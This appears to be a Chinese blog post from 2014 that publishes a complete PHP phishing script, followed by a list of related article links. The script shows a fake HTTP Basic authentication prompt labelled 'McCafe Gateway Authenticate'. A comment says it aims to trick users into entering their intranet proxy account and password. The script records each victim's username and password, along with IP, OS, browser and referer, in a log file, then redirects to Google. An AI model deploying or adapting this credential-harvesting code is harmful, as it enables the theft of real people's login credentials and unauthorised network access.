PHP 基础认证钓鱼脚本
2014-11-30 02:12
453 查看
<?php function getBrowse() { global $_SERVER; $Agent = $_SERVER['HTTP_USER_AGENT']; $browser = ''; $browserver = ''; $Browser = array('Lynx', 'MOSAIC', 'AOL', 'Opera', 'JAVA', 'MacWeb', 'WebExplorer', 'OmniWeb'); for($i = 0; $i <= 7; $i ++){ if(strpos($Agent, $Browsers[$i])){ $browser = $Browsers[$i]; $browserver = ''; } } if(ereg('Mozilla', $Agent) && ereg('Maxthon', $Agent)){ $temp = explode('Maxthon/', $Agent); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[0]; $browser = 'Maxthon'; } if(ereg('Mozilla', $Agent) && ereg('Chrome', $Agent) && !ereg('Maxthon', $Agent)){ $temp = explode('Chrome/', $Agent); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[0]; $browser = 'Chrome'; } if(ereg('Mozilla', $Agent) && ereg('Opera', $Agent)) { $temp = explode('(', $Agent); $Part = $temp[1]; $temp = explode(')', $Part); $browserver = $temp[1]; $temp = explode(' ', $browserver); $browserver = $temp[2]; $browserver = preg_replace('/([d.]+)/', '\1', $browserver); $browserver = $browserver; $browser = 'Opera'; } if(ereg('Mozilla', $Agent) && ereg('MSIE', $Agent)){ $temp = explode('(', $Agent); $Part = $temp[1]; $temp = explode(';', $Part); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[2]; $browserver = preg_replace('/([d.]+)/','\1',$browserver); $browserver = $browserver; $browser = 'Internet Explorer'; } if($browser != ''){ $browseinfo = $browser.' '.$browserver; } else { $browseinfo = 'Unknow Browser'; } return $browseinfo; } function getIP () { global $_SERVER; if (getenv('HTTP_CLIENT_IP')) { $ip = getenv('HTTP_CLIENT_IP'); } else if (getenv('HTTP_X_FORWARDED_FOR')) { $ip = getenv('HTTP_X_FORWARDED_FOR'); } else if (getenv('REMOTE_ADDR')) { $ip = getenv('REMOTE_ADDR'); } else { $ip = $_SERVER['REMOTE_ADDR']; } return $ip; } function getOS () { global $_SERVER; $agent = $_SERVER['HTTP_USER_AGENT']; $os = false; if (eregi('win', $agent) && strpos($agent, '95')){ $os = 'Windows 95'; } else if (eregi('win 9x', $agent) && strpos($agent, '4.90')){ $os = 'Windows ME'; } else if (eregi('win', $agent) && ereg('98', $agent)){ $os = 'Windows 98'; } else if (eregi('win', $agent) && eregi('nt 6.1', $agent)){ $os = 'Windows 7'; } else if (eregi('win', $agent) && eregi('nt 6', $agent)){ $os = 'Windows Vista'; } else if (eregi('win', $agent) && eregi('nt 5.1', $agent)){ $os = 'Windows XP'; } else if (eregi('win', $agent) && eregi('nt 5', $agent)){ $os = 'Windows 2000'; } else if (eregi('win', $agent) && eregi('nt', $agent)){ $os = 'Windows NT'; } else if (eregi('win', $agent) && ereg('32', $agent)){ $os = 'Windows 32'; } else if (eregi('linux', $agent)){ $os = 'Linux'; } else if (eregi('unix', $agent)){ $os = 'Unix'; } else if (eregi('sun', $agent) && eregi('os', $agent)){ $os = 'SunOS'; } else if (eregi('ibm', $agent) && eregi('os', $agent)){ $os = 'IBM OS/2'; } else if (eregi('Mac', $agent) && eregi('PC', $agent)){ $os = 'Macintosh'; } else if (eregi('PowerPC', $agent)){ $os = 'PowerPC'; } else if (eregi('AIX', $agent)){ $os = 'AIX'; } else if (eregi('HPUX', $agent)){ $os = 'HPUX'; } else if (eregi('NetBSD', $agent)){ $os = 'NetBSD'; } else if (eregi('BSD', $agent)){ $os = 'BSD'; } else if (ereg('OSF1', $agent)){ $os = 'OSF1'; } else if (ereg('IRIX', $agent)){ $os = 'IRIX'; } else if (eregi('FreeBSD', $agent)){ $os = 'FreeBSD'; } else if (eregi('teleport', $agent)){ $os = 'teleport'; } else if (eregi('flashget', $agent)){ $os = 'flashget'; } else if (eregi('webzip', $agent)){ $os = 'webzip'; } else if (eregi('offline', $agent)){ $os = 'offline'; } else { $os = 'Unknown'; } return $os; } function getReferer() { global $_SERVER; if(isset($_SERVER['HTTP_REFERER']) and $_SERVER['HTTP_REFERER'] !="") return $_SERVER['HTTP_REFERER']; else return ""; } function getTime() { return date("Y-m-d h:i:s A",time()); } function getbasic() { $input = $_SERVER['PHP_AUTH_USER']; if (!isset($input)) { header('WWW-Authenticate: Basic realm="McCafe Gateway Authenticate"');//让用户输入内网代理账户密码 header('HTTP/1.0 401 Unauthorized'); echo '<script>alert(\'Account password input error\');</script>'; //提示认证失败,并没有输入账户密码 $err = 'IP:'.getIP()."\t".'OS:'.getOS()."\t".'Browser:'.getBrowse() . "\t" ."\t" . "\t" . "Referer:" . getReferer() . "\t" . "\t" . "Time:" .getTime(); $fp = fopen("error.log","a+"); //写入失败日志 fwrite($fp,$err); fwrite($fp,"\r\n\r\n"); fclose($fp); }else { $user = $_SERVER['PHP_AUTH_USER']; //定义user $pwd = $_SERVER['PHP_AUTH_PW']; //定义password $str = 'IP:'.getIP()."\t".'OS:'.getOS()."\t".'Browser:'.getBrowse() . "\t" ."\t" . "\t" . "Referer:" . getReferer() . "\t" . "\t" . "Time:" .getTime()."\t"."username:".$user."\t"."password:".$pwd; $file = fopen("log.log","a+"); //写入文件 fwrite($file,$str); fwrite($file,"\r\n\r\n"); fclose($file); header("Location: http://www.google.com/"); //成功就跳转,跳转地址自己定义。根据目标网站类型不同跳转。 } } getbasic(); ?>
相关文章推荐
- 黑客基础PHP脚本注入
- 基础认证钓鱼利用代码----bemo-xss 4.0
- 一个简单的php LDAP认证脚本
- 基础认证钓鱼
- PHP脚本安全基础
- web服务器脚本安全 基础学习 总结【对应php 脚本】
- 基础认证钓鱼代码编写
- 1.2 - 第一章:PHP基础 - 解剖一个PHP脚本
- 几个php基础实现脚本
- PHP基础知识之————PHP Web脚本中使用FFmpeg
- 博客园存在基础认证钓鱼(401)可获取cookie
- 通过powershell实现基础认证钓鱼获得密码
- 简单身份认证之php脚本
- 基础认证钓鱼攻击与防范
- php嵌入脚本语言基础知识整理
- 安装完最小化 RHEL/CentOS 7 后需要做的 30 件事情7. 安装 PHP PHP 是用于 web 基础服务的服务器端脚本语言。它也经常被用作通用编程语言。在最小化安装的 CentOS 中安
- 使用php重新实现PHP脚本引擎内置函数
- PHP注入基础
- PHP 和 MySQL 基础教程(三)
- 万能上传击溃ASP/PHP/JSP脚本系统